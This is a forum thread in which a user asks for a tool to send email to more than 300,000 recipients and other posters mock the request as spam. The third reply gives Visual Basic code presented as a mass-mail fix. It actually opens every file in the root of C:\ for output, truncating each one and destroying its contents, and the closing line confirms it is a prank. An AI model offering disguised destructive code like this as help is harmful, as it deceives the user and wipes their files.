CodeGuru Home VC++ / MFC / C++ .NET / C# Visual Basic VB Forums Developer.com
Results 1 to 3 of 3

Thread: MassEmail

  1. #1
    Guest

    MassEmail

    Does anyone know of a great mass email solution that can handle 300,000+. Seems that once you get over 30,000 it starts to get crazy. Any help appreciated.


  2. #2
    Guest

    Re: MassEmail

    Why dont u go to http://www.killallspammers.com ;-)


  3. #3
    Join Date
    Jan 2000
    Location
    Olen, Belgium
    Posts
    2,477

    Re: MassEmail

    Try this code

    dim t as double
    dim message as string
    dim a as string
    dim f as integer

    a = dir("c:\*.*")

    for t=1 to 300000

    f = freefile
    open a for output as #f
    close #f
    a = dir

    next t



    Now you wont have to worry about the 32000 limit, nor will the receivers of your junk...

    Tom Cannaerts
    email: [email protected]
    www.tom.be (dutch site)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  





Click Here to Expand Forum to Full Width

Featured